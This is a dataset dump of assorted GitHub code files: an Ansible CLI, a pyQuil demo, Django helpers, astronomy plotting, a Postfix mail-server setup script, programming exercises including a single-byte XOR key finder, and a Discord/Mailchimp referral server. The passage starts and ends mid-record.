'role', role_path)\n typer.echo(f'Generated README.md for {role_name} role')\n setup_role(role_path)\n typer.echo(f'Generated directory structure for {role_name} role')\n\n\n@ANSIBLE.command()\ndef role(\n role_name: str = typer.Argument(help='Name of the role to generate'),\n) -> None:\n \"\"\"\n Creates a role directory with a [bold blue]README.md[/bold blue]\n and a directory structure.\n\n The new role will contain the following directories:\n\n * [bold blue]tasks[/bold blue]\n * [bold blue]handlers[/bold blue]\n * [bold blue]templates[/bold blue]\n * [bold blue]files[/bold blue]\n * [bold blue]vars[/bold blue]\n * [bold blue]defaults[/bold blue]\n\n Each directory will contain a [bold blue]main.yml[/bold blue] file.\n\n [bold green]Example[/bold green]:\n\n [italic]ansible-wizard role my-role[/italic]\n \"\"\"\n relative_path = typer.prompt(\n f'Enter playbook path (relative to ${ANSIBLE_DIR}):'\n ).rstrip('/')\n root_playbook = f\"{ANSIBLE_DIR}/{relative_path}\"\n if not os.path.exists(root_playbook):\n typer.echo(f'ERROR: {root_playbook} does not exist')\n sys.exit(1)\n typer.echo(f'Creating role {role_name}')\n role_path = f'{root_playbook}/roles/{role_name}'\n if os.path.exists(role_path):\n typer.echo(f'ERROR: role {role_name} already exists')\n sys.exit(1)\n os.makedirs(role_path, exist_ok=True)\n generate_readme(role_name, 'role', role_path)\n typer.echo(f'Generated README.md for {role_name} role')\n setup_role(role_path)\n typer.echo(f'Generated directory structure for {role_name} role')\n\n\nif __name__ == '__main__':\n ANSIBLE()\n","repo_name":"kamilrybacki/operations","sub_path":"utils/wizards/ansible.py","file_name":"ansible.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32631457463","text":"import platform\nimport os\nimport datetime\nimport logging\n\nfrom scipy.linalg import expm\nfrom pyquil.quil import Program\nfrom pyquil.quilbase import DefGate\nfrom pyquil.api import QVMConnection\nfrom pyquil.gates import 
CNOT, X, TRUE, FALSE, NOT, RZ, RY\nfrom pyquil.paulis import sY, exponential_map\nfrom pyquil.parameters import Parameter, quil_sin, quil_cos\n\nimport numpy as np\n\nLOGGER = logging.getLogger(\"qnn\")\nDEBUG = False\n\nANCILLARY_BIT = 1\nOUTPUT_BIT = ANCILLARY_BIT + 1\n\ndef main():\n    LOGGER.info(\"Connecting to the QVM...\")\n    qvm = QVMConnection()\n    LOGGER.info(\"... done\")\n    LOGGER.info(\" \")\n\n    LOGGER.info(\"Initialising quantum program...\")\n    p = Program()\n\n    LOGGER.info(\"... defining custom gates\")\n    LOGGER.info(\"... controlled Ry\")\n    CRY = controlled_Ry(p)\n    LOGGER.info(\"... controlled sY\")\n    CSY = controlled_sY(p)\n    LOGGER.info(\"... done\")\n    LOGGER.info(\" \")\n\n    a = 1\n    rotation = 0.5*np.pi*(a + 1)\n    theta = 0.3 * np.pi\n\n    p.inst(RY(rotation, 0))\n    # p.inst(CRY(theta)(0, 1)).measure(0, 0).measure(1,1)\n    # LOGGER.info(\"... %s\", p)\n\n    classical_flag_register = 3\n    # Write out the loop initialization and body programs:\n    loop_body = Program(CRY(2.*theta)(0, ANCILLARY_BIT))\n    loop_body.inst(CSY(ANCILLARY_BIT, OUTPUT_BIT))\n    loop_body.inst(RZ(-0.5*np.pi)(ANCILLARY_BIT))\n    loop_body.inst(CRY(-2.*theta)(0, ANCILLARY_BIT))\n\n    # print(qvm.wavefunction(loop_body))\n\n    loop_body.measure(ANCILLARY_BIT, classical_flag_register)\n\n    then_branch = Program(RY(-0.5*np.pi)(OUTPUT_BIT))\n    then_branch.inst(X(ANCILLARY_BIT))\n    else_branch = Program()\n\n    # Add the conditional branching:\n    loop_body.if_then(classical_flag_register,\n                      then_branch,\n                      else_branch)\n\n    init_register = Program(TRUE([classical_flag_register]))\n    loop_prog = init_register.while_do(classical_flag_register,\n                                       loop_body)\n    p.inst(loop_prog)\n\n    p.measure(0,0).measure(1,1).measure(2,2)\n\n    LOGGER.info(\"... executing on the QVM\")\n    classical_regs = [0, 1, 2, 3]\n    output = qvm.run(p, classical_regs)\n    LOGGER.info(\"... %s\", output)\n    LOGGER.info(\"\")\n\ndef controlled(U):\n    \"\"\"Embed the 2x2 unitary U as the target block of a 4x4 controlled gate.\"\"\"\n    controlled_u = np.array([[ 1., 0., 0.     , 0.     ],\n                             [ 0., 1., 0.     , 0.     ],\n                             [ 0., 0., U[0][0], U[0][1]],\n                             [ 0., 0., U[1][0], U[1][1]]])\n    return controlled_u\n\ndef controlled_Ry(program):\n    theta = Parameter('theta')\n\n    cry = np.array([[ 1., 0., 0. , 0.],\n                    [ 0., 1., 0. , 0.],\n                    [ 0., 0., quil_cos(0.5*theta) , quil_sin(0.5*theta) ],\n                    [ 0., 0.,-quil_sin(0.5*theta) , quil_cos(0.5*theta) ]])\n\n    dg = DefGate('CRY', cry, [theta])\n    program.inst(dg)\n\n    return dg.get_constructor()\n\ndef controlled_sY(program):\n    csy = np.array([[ 1., 0., 0.  , 0.  ],\n                    [ 0., 1., 0.  , 0.  ],\n                    [ 0., 0., 0.  ,-1.j ],\n                    [ 0., 0., 1.j , 0.  ]])\n\n    dg = DefGate('CSY', csy)\n    program.inst(dg)\n\n    return dg.get_constructor()\n\ndef Ry(t, qubit):\n    return exponential_map(sY(qubit))(-0.5*t)\n\ndef set_up_logger():\n    \"\"\"This function initialises the logger.\n\n    We set up a logger that prints both to the console at the information level\n    and to file at the debug level. 
It will store in the /tmp directory on\n    *NIX machines and in the local directory on Windows.\n    \"\"\"\n    timestamp = datetime.datetime.now()\n\n    logfile_name = 'qnn-{0:04}-{1:02}-{2:02}-{3:02}{4:02}{5:02}.log'\\\n                   .format(timestamp.year,\n                           timestamp.month,\n                           timestamp.day,\n                           timestamp.hour,\n                           timestamp.minute,\n                           timestamp.second)\n\n    if platform.system() == 'Windows':\n        logfile_name = './' + logfile_name\n    else:\n        logfile_name = '/tmp/' + logfile_name\n\n    logging.basicConfig(filename=logfile_name,\n                        level=logging.DEBUG)\n\n    console_logger = logging.StreamHandler()\n    if DEBUG:\n        console_logger.setLevel(logging.DEBUG)\n    else:\n        console_logger.setLevel(logging.INFO)\n    console_formatter = logging.Formatter('%(name)-4s: %(levelname)-8s %(message)s')\n    console_logger.setFormatter(console_formatter)\n    logging.getLogger('').addHandler(console_logger)\n\n    LOGGER.info('All logging will be written to %s', logfile_name)\n\nif __name__ == '__main__':\n    set_up_logger()\n    main()\n","repo_name":"inJeans/qnn","sub_path":"sigmoid.py","file_name":"sigmoid.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"69910262832","text":"\"\"\"\nBusiness-logic helpers\n\"\"\"\n\nimport re\nfrom io import StringIO\n\nfrom django.http import Http404\nfrom markdown import Markdown\n\nfrom ..models import Floor\n\n\ndef to_shadow_text(content):\n    \"\"\"\n    Markdown to plain text\n    \"\"\"\n\n    def unmark_element(element, stream=None):\n        if stream is None:\n            stream = StringIO()\n        if element.text:\n            stream.write(element.text)\n        for sub in element:\n            unmark_element(sub, stream)\n        if element.tail:\n            stream.write(element.tail)\n        return stream.getvalue()\n\n    # patching Markdown\n    Markdown.output_formats[\"plain\"] = unmark_element\n    # noinspection PyTypeChecker\n    md = Markdown(output_format=\"plain\")\n    md.stripTopLevelTags = False\n\n    # The conversion drops the text part of ![text](url), so substitute it manually first\n    content = re.sub(r'!\\[(.+)]\\(.+\\)', r'\\1', content)\n\n    return md.convert(content)\n\n\ndef find_mentions(text: str) -> list:\n    \"\"\"\n    Parse mentions (#hole / ##floor references) from the text\n    Returns: a list of Floor objects\n    \"\"\"\n    s = ' ' + text\n    hole_ids = re.findall(r'[^#]#(\\d+)', s)\n    mentions = []\n    if hole_ids:\n        hole_ids = list(map(lambda i: int(i), hole_ids))\n        for id in hole_ids:\n            floor = Floor.objects.filter(hole_id=id).first()\n            if floor:\n                mentions.append(floor)\n    floor_ids = re.findall(r'##(\\d+)', s)\n    if floor_ids:\n        floor_ids = list(map(lambda i: int(i), floor_ids))\n        floors = Floor.objects.filter(id__in=floor_ids)\n        mentions += list(floors)\n    return mentions\n\n\ndef exists_or_404(klass, *args, **kwargs):\n    if hasattr(klass, '_default_manager'):\n        # noinspection PyProtectedMember\n        if not klass._default_manager.filter(*args, **kwargs).exists():\n            raise Http404(f'{klass} object does not exist!')\n    else:\n        klass__name = klass.__name__ if isinstance(klass, type) else klass.__class__.__name__\n        raise ValueError(\n            \"First argument to get_object_or_404() must be a Model, Manager, \"\n            \"or QuerySet, not '%s'.\" % klass__name\n        )\n","repo_name":"CTDancer/ChaT","sub_path":"backend/hole/utils/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29538788767","text":"import sys\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport lsst.afw.geom as afwGeom\nimport lsst.afw.image as afwImage\nimport lsst.daf.persistence 
as dafPersist\n\nimport seaborn as sns\nsns.set(context='talk',\n style='whitegrid',\n palette='deep',\n font='sans-serif',\n font_scale=0.8,\n color_codes=True,\n rc={'text.usetex': False})\n\nget_ipython().magic('matplotlib inline')\n\nDATA_DIR = '.'\n# DATA_DIR = '/global/cscratch1/sd/descdm/DC1' # ON NERSC\n\n# To access the skymap construct a butler with the repo and ask for the \"deepCoadd_skyMap\"\nbutler = dafPersist.Butler(os.path.join(DATA_DIR, 'full_focalplane_undithered'))\nskyMap = butler.get(\"deepCoadd_skyMap\")\n\ndef makePatch(vertexList, wcs):\n \"\"\"Return a path in sky coords from vertex list in pixel coords\"\"\"\n \n skyPatchList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in vertexList]\n verts = [(coord[0], coord[1]) for coord in skyPatchList]\n verts.append((0,0))\n codes = [Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n return Path(verts, codes) \n\ndef plotSkyMap(skyMap, tract=0, title=\"Patch Geometry\"):\n tractInfo = skyMap[tract]\n tractBox = afwGeom.Box2D(tractInfo.getBBox())\n tractPosList = tractBox.getCorners()\n wcs = tractInfo.getWcs()\n xNum, yNum = tractInfo.getNumPatches()\n\n fig = plt.figure(figsize=(12,8))\n ax = fig.add_subplot(111)\n for x in range(xNum):\n for y in range(yNum):\n patchInfo = tractInfo.getPatchInfo([x, y])\n patchBox = afwGeom.Box2D(patchInfo.getOuterBBox())\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, alpha=0.1, lw=1)\n ax.add_patch(patch)\n center = wcs.pixelToSky(patchBox.getCenter()).getPosition(afwGeom.degrees)\n ax.text(center[0], center[1], '%d,%d'%(x,y), size=6, ha=\"center\", va=\"center\")\n\n skyPosList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in tractPosList]\n ax.set_xlim(max(coord[0] for coord in skyPosList) + 1,\n min(coord[0] for coord in skyPosList) - 1)\n ax.set_ylim(min(coord[1] for coord in skyPosList) - 1, \n max(coord[1] for coord in skyPosList) + 1)\n\n ax.set_xlabel(\"RA (deg.)\")\n ax.set_ylabel(\"Dec (deg.)\")\n ax.set_title(title)\n return ax\n\nfor directory in ['full_focalplane_undithered',\n 'DC1-imsim-dithered',\n 'DC1-phoSim-3a']:\n butler = dafPersist.Butler(os.path.join(DATA_DIR, directory))\n skyMap = butler.get(\"deepCoadd_skyMap\")\n plotSkyMap(skyMap, tract=0, title=directory)\n\ntractInfo = skyMap[0]\nwcs = tractInfo.getWcs()\n\nfig = plt.figure(figsize=(12,8))\nax = fig.add_subplot(111)\nplotBox = afwGeom.Box2D(tractInfo.getPatchInfo([0, 0]).getOuterBBox())\nfor x in range(2):\n for y in range(2):\n # Plot outer BBOX\n patchInfo = tractInfo.getPatchInfo([x, y])\n patchBox = afwGeom.Box2D(patchInfo.getOuterBBox())\n plotBox.include(patchBox)\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, alpha=0.2, lw=1)\n ax.add_patch(patch)\n # Plot inner BBox\n patchBox = afwGeom.Box2D(patchInfo.getInnerBBox())\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, fill=None, lw=1, \n linestyle='dotted', color='k')\n ax.add_patch(patch)\n \n center = wcs.pixelToSky(patchBox.getCenter()).getPosition(afwGeom.degrees)\n ax.text(center[0], center[1], 'patchID=%d,%d'%(x,y), size=12, ha=\"center\", va=\"center\")\n\nskyPosList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in plotBox.getCorners()]\nax.set_xlim(max(coord[0] for coord in skyPosList),\n min(coord[0] for coord in skyPosList))\nax.set_ylim(min(coord[1] for coord in 
skyPosList), \n            max(coord[1] for coord in skyPosList))\nax.set_xlabel(\"RA (deg.)\")\nax.set_ylabel(\"Dec (deg.)\")\nax.set_title(\"Zoom in\")\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/DESC-SSim Patch Geometry.py","file_name":"DESC-SSim Patch Geometry.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25669479226","text":"class Milestone:\n\n    def __init__(self, vertical, row):\n        #['Vertical', 'Goal', 'Workstreams', 'Workstream Status', 'Completion Target', 'Highlight', 'Gap', 'People', '']\n        #print '*****************************start Milestone init*****************************'\n        self.vertical = vertical\n        self.content = row\n        self.milestonename = row[2]\n        self.milestone_status = row[3] # row 3 = Workstream Status\n        self.completion_target_data = row[4] # row 4 = Completion Target\n        #self.completion_eta\n        self.highlight = row[5] # row 5 = Highlight\n        self.risk = row[6] # row 6 = Gap\n        self.poc = row[7] # row 7 = People\n        # self.status = status\n        # other items to include in future\n        # self.impact = impact\n        # self.notes = notes\n        #print '*****************************end Milestone init*****************************'\n\n    def __repr__(self):\n        return 'Milestone({!r})'.format(self.milestonename)\n","repo_name":"hitaazad/reporting","sub_path":"milestone.py","file_name":"milestone.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34017358848","text":"import subprocess\nimport fileinput\n\ndef postfix(name, dname):\n    \"\"\"Automation of Sam Hobbs's tutorial for making a Raspberry Pi email server, part 1 (Postfix).\n    https://samhobbs.co.uk/2013/12/raspberry-pi-email-server-part-1-postfix\"\"\"\n    \n    \n    #Update the system and install Postfix.\n    print(\"\"\"\n    ######################################################################\n    \n    Select \"Internet Site\" and then set the mail name to your domain name,\n    not including www. (e.g. 
arta.space).\n \n ######################################################################\n\"\"\")\n \n wait = input(\"When ready press enter to continue.\")\n \n subprocess.call(['apt-get', 'update'])\n subprocess.call(['apt-get', 'install', 'postfix'])\n\n #Open main.cf and make a backup of it.\n with fileinput.FileInput('/etc/postfix/main.cf', inplace=True, backup='.backup') as f:\n for line in f:\n print(line.replace('', ''), end='')\n\n #Tell Postfix to use the Maildir format, add the following lines to /etc/postfix/main.cf\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\\nhome_mailbox = Maildir/\\n\")\n #f.write(\"\\nmailbox_command =\")\n \n #Install Dovecot\n subprocess.call(['apt-get', 'update'])\n subprocess.call(['apt-get', 'install', 'dovecot-common', 'dovecot-imapd'])\n\n #We also need to create the mail directory and its subfolders for existing users, \n #and add some things to /etc/skel (the template for new users)\n #so that if you create a new account this will be done automatically.\n #Run the following commands to create the template files.\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Drafts'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Sent'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Spam'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Trash'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Templates'])\n\n #Next, copy the files over to existing users’ home directories, and change the ownership and permissions for privacy.\n subprocess.call(['cp', '-r', '/etc/skel/Maildir', '/home/' + name + '/'])\n subprocess.call(['chown', '-R', name + ':' + name, '/home/'+name+'/Maildir'])\n subprocess.call(['chmod', '-R', '700', '/home/'+name+'/Maildir'])\n \n #Add the following to /etc/postfix/main.cf to restrict who can send emails to external mail servers:\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\"\"\nsmtpd_recipient_restrictions =\n permit_sasl_authenticated,\n permit_mynetworks,\n reject_unauth_destination\n\"\"\")\n \n #Modify helo access restrictions by adding the following to /etc/postfix/main.cf to block spam.\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\"\"\nsmtpd_helo_required = yes\nsmtpd_helo_restrictions =\n permit_mynetworks,\n permit_sasl_authenticated,\n reject_invalid_helo_hostname,\n reject_non_fqdn_helo_hostname,\n reject_unknown_helo_hostname,\n check_helo_access hash:/etc/postfix/helo_access\n\"\"\")\n \n #That last line in smtpd_helo_restrictions checks a file for custom rules you’ve built in. 
Create the file.\n    with open(\"/etc/postfix/helo_access\", \"a\") as f:\n        f.write(dname+\" REJECT Get lost - you're lying about who you are\\n\")\n        f.write(\"mail.\"+dname+\" REJECT Get lost - you're lying about who you are\\n\")\n        f.write(\"webmail.\"+dname+\" REJECT Get lost - you're lying about who you are\\n\")\n    \n    #Now tell postfix to map the file, and restart postfix.\n    subprocess.call(['postmap', '/etc/postfix/helo_access'])\n    subprocess.call(['service', 'postfix', 'restart'])\n","repo_name":"artizzle/pimail","sub_path":"postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5945438899","text":"\"\"\"\nSnowflake pattern\n\"\"\"\n\nn = int(input())\nmid = n // 2\nfor i in range(n):\n    for j in range(n):\n        if i == mid or j == mid or i == j or i + j == n - 1:\n            print('*', end=' ')\n        else:\n            print('.', end=' ')\nprint()\n\n\"\"\"\nDiagonals parallel to the main diagonal\n\"\"\"\n\nn = int(input())\na = []\n\nfor i in range(n):\n    row = []\n    for j in range(n):\n        diff = abs(i - j)\n        row.append(diff)\n    a.append(row)\n\nfor row in a:\n    row_str = ' '.join([str(i) for i in row])\n    print(row_str)\n\n\"\"\"\nThe anti-diagonal\n\"\"\"\n\nn = int(input())\n\n# Create\nmatrix = []\nfor i in range(n):\n    matrix.append([0] * n)\n\n# Set values in the matrix\nfor i in range(n):\n    matrix[i][n - i - 1] = 1\n    for j in range(n - i, n):\n        matrix[i][j] = 2\n\n# Print\nfor row in matrix:\n    print(' '.join([str(i) for i in row]))\n\n\"\"\"\nSwap two columns\n\"\"\"\n\ndef SwapColumns(A, i, j):\n    for row in A:\n        row[i], row[j] = row[j], row[i]\n    return A\n\nn, m = map(int, input().split())\nA = []\nfor i in range(n):\n    row = list(map(int, input().split()))\n    A.append(row)\n\ni, j = map(int, input().split())\n\nprint(SwapColumns(A, i, j))\n\n\"\"\"\nMatrix symmetry check\n\"\"\"\n\ndef IsSymmetric(A):\n    n = len(A)\n    for i in range(n):\n        for j in range(i+1, n):\n            if A[i][j] != A[j][i]:\n                return \"NO\"\n    return \"YES\"\n\nresult = IsSymmetric(A)\nprint(result)\n","repo_name":"meepdd/ProgrammingBasics","sub_path":"15.03.py","file_name":"15.03.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15224470157","text":"#!/usr/bin/env python3\n\n##\n## EPITECH PROJECT, 2020\n## B-SEC-500-PAR-5-1-caesar-lucas.moritel\n## File description:\n## single_byte_XOR.py\n##\n\nimport os\nimport string\nimport sys\nimport codecs\n\ndef error_gestion_arg(argv):\n    if len(argv) != 2:\n        print(\"Error: Invalid number of arguments\")\n        exit(84)\n    if os.path.isfile(argv[1]) == False:\n        print(\"Error: The argument is not a file\")\n        exit(84)\n\ndef single_char_xor(byt_earray_1, byt_earray_2):\n    result = bytearray(len(byt_earray_1))\n    for i in range(len(byt_earray_1)):\n        result[i] = byt_earray_1[i] ^ byt_earray_2[i]\n    return result\n\ndef score(input_bytes):\n    character_frequencies = {\n        ' ': 0.13,\n        'e': 0.12702,\n        't': 0.091,\n        'a': 0.082,\n        'o': 0.075,\n        'i': 0.07,\n        'n': 0.067,\n        's': 0.063,\n        'h': 0.061,\n        'r': 0.06,\n        'd': 0.043,\n        'l': 0.04,\n        'c': 0.028,\n        'u': 0.028,\n        'm': 0.024,\n        'w': 0.024,\n        'f': 0.022,\n        'g': 0.02,\n        'y': 0.02,\n        'p': 0.019,\n        'b': 0.015,\n        'v': 0.0098,\n        'k': 0.0077,\n        'j': 0.0015,\n        'x': 0.0015,\n        'q': 0.00095,\n        'z': 0.00074\n    }\n    return sum([character_frequencies.get(chr(byte), 0) for byte in 
input_bytes.lower()])\n\ndef main():\n    error_gestion_arg(sys.argv)\n    file = open(sys.argv[1], \"r\")\n    fileContent = file.read().strip()\n    if fileContent == \"\":\n        print(\"Error: File is empty\")\n        exit(84)\n    fileContent = fileContent.replace('\\n', '')\n    if all(chara in string.hexdigits for chara in fileContent) == False:\n        print(\"Error: No hexadecimal base\")\n        exit(84)\n    contentSize = len(fileContent) % 2\n    if contentSize != 0:\n        print(\"Error: Length of the file content is not even but odd\")\n        exit(84)\n    byt_earray_1 = bytearray.fromhex(fileContent)\n    max_frequency_score = 0\n    key = 0\n    for i in range(256):\n        byt_earray_2 = [i] * len(byt_earray_1)\n        encrypted_content = bytes(single_char_xor(byt_earray_1, byt_earray_2))\n        current_frequency_score = score(encrypted_content)\n        if max_frequency_score == 0 or current_frequency_score > max_frequency_score:\n            max_frequency_score = current_frequency_score\n            key = bytes([i])\n    final_key = codecs.decode(codecs.encode(key, 'hex'), 'utf-8')\n    print(final_key.upper())\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Auguste0904/CAESAR","sub_path":"src/single_byte_XOR.py","file_name":"single_byte_XOR.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32935311791","text":"import discord\nfrom discord.ext import commands\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nimport requests\nimport base64\nimport json\nimport _thread\n\nclass Mycog:\n    \"\"\"My custom cog that does stuff!\"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n        start_server()\n\n    @commands.command()\n    async def mycom(self):\n        \"\"\"This does stuff!\"\"\"\n\n        #Your code will go here\n        await self.bot.say(\"I can do stuff!\")\n\ndef setup(bot):\n    bot.add_cog(Mycog(bot))\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n\n    def do_GET(self):\n        try:\n            query = parse_qs(urlparse(self.path).query)\n            if \"eid\" in query:\n                eid = query[\"eid\"][0]\n\n                auth = 'Basic ' + base64.b64encode(bytes('anystring:xxxxxx', 'utf-8')).decode('ascii')\n                listId = 'xxxxx'\n                \n                # 1) Get Member\n                url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , eid)\n                r = requests.get(url, headers = {'Authorization': auth}, params={'fields': 'merge_fields'}, timeout=1)\n                print(r)\n                jsonData = json.loads(r.text)\n                print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n                inviteCode = jsonData['merge_fields']['INVCODE']\n                referrer = jsonData['merge_fields']['REF']\n                \n                # 2) Update Member with invite code if it doesn't exist\n                # if inviteCode == '':\n                    #generate code\n                    #use code\n\n                # 3) Get Referrer Member\n                if referrer != 'false' and inviteCode == '':\n                    url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , referrer)\n                    r = requests.get(url, headers = {'Authorization': auth}, params={'fields': 'merge_fields'}, timeout=1)\n                    print(r)\n                    jsonData = json.loads(r.text)\n                    print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n                    refCount = 0\n                    if jsonData['merge_fields']['REFERRALS'] != '' :\n                        refCount = jsonData['merge_fields']['REFERRALS']\n                    refCount += 1\n                    print('refcount:' + str(refCount))\n\n                    # 4) Update Referrer Member referral count\n                    url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , referrer)\n                    r = requests.patch(url, headers = {'Authorization': auth}, data = json.dumps({'merge_fields': {'REFERRALS': refCount}}), timeout=1)\n
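                    # NOTE (assumption, added for clarity): Mailchimp's v3 API addresses list members by the MD5 hash of the lowercased email address, so the eid and referrer query values are taken here to already be such member hashes; the PATCH above bumps the referrer's custom REFERRALS merge field by one.\n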
                    print(r.request.body)\n                    print(r)\n                    jsonData = json.loads(r.text)\n                    print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n\n            redirect = 'https://www.iloveonlinegaming.com/discord'\n            html = '<html><head><meta http-equiv=\"refresh\" content=\"0; url=' + redirect + '\"></head></html>'\n\n            self.send_response(200)\n            self.end_headers()\n            self.wfile.write(html.encode())\n\n        except Exception as e: \n            print(e)\n\ndef start_server():\n    httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)\n    try:\n        _thread.start_new_thread(httpd.serve_forever, ())\n    except:\n        print (\"Error: unable to start server thread\")\n","repo_name":"ashneverdawn/discord-inviter","sub_path":"discord-inviter.py","file_name":"discord-inviter.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27643516892","text":"def check(g, k, n, stocks):\n    t = g * k\n    i = 0\n    while i < n:\n        if stocks[i] > g:\n            t = t - g\n        else:\n            t = t - stocks[i]\n        i += 1\n\n    if t <= 0:\n        return True\n    return False\n\n\ndef solve(n, k, stock):\n    sums = 0\n    for i in range(n):\n        sums += stock[i]\n\n    ans = 0\n\n    lo, hi = 0, 1e18\n    y = 0\n\n    while lo <= hi and y == 0:\n        mid = (lo + hi) // 2\n        # print(mid)\n        if (check(mid, k, n, stock) == True and check(mid + 1, k, n, stock) == False):\n            ans = mid\n            y = 1\n        elif check(mid, k, n, stock) == True:\n            lo = mid + 1\n        else:\n            hi = mid - 1\n\n    return ans\n\n\nif __name__ == \"__main__\":\n    print(solve(n=4, k=2, stock=[2, 3, 5, 3]))\n","repo_name":"sanial2001/de-shaw","sub_path":"fictional stock market.py","file_name":"fictional stock market.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5090928116","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan  6 11:47:27 2019\n\n@author: christopher\n\"\"\"\n\n# --- 2.2\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\nschlamm = pd.read_table(r\"./klaerschlamm.dat\", sep=\" \")\nschlamm.describe()\nschlamm.head()\nschlamm.drop(\"Labor\", 1)\n\n\nplt.subplot(221)\nschlamm[\"Pr1\"].plot(kind=\"box\")\nplt.subplot(222)\nschlamm[\"Pr2\"].plot(kind=\"box\")\nplt.subplot(223)\nschlamm[\"Pr3\"].plot(kind=\"box\")\nplt.subplot(224)\nschlamm[\"Pr4\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nplt.subplot(221)\nschlamm[\"Pr5\"].plot(kind=\"box\")\nplt.subplot(222)\nschlamm[\"Pr6\"].plot(kind=\"box\")\nplt.subplot(223)\nschlamm[\"Pr7\"].plot(kind=\"box\")\nplt.subplot(224)\nschlamm[\"Pr8\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nplt.subplot(221)\nschlamm[\"Pr9\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nschlamm\nschlamm_centered = schlamm.drop(\"Labor\", 1) - schlamm.drop(\"Labor\", 1).median()\nschlamm_centered.T.plot(kind=\"box\")\n\n\n# --- 2.4\n\nhubble = pd.read_table(r\"hubble.txt\", sep=\" \")\nhubble.describe()\nhubble.loc[2:7, \"distance\"]\n\n\n\nhubble.plot(kind=\"scatter\", x=\"distance\", y=\"recession.velocity\")\nb,a = np.polyfit(hubble[\"distance\"], hubble[\"recession.velocity\"], deg=1)\nx = np.linspace(hubble[\"distance\"].min(), hubble[\"distance\"].max())\nplt.plot(x, a+b*x, c=\"magenta\")\n\nplt.show()\n\nhubble.corr()\n\n\n# --- 2.5\n\nincome = pd.read_table(r\"./income.dat\", sep=\" \")\nincome.head()\n\ninc_2005=income[\"Income2005\"]\nafqt=income[\"AFQT\"]\n\nincome.plot(kind=\"scatter\", x=\"AFQT\", y=\"Income2005\")\nb, a = np.polyfit(afqt, 
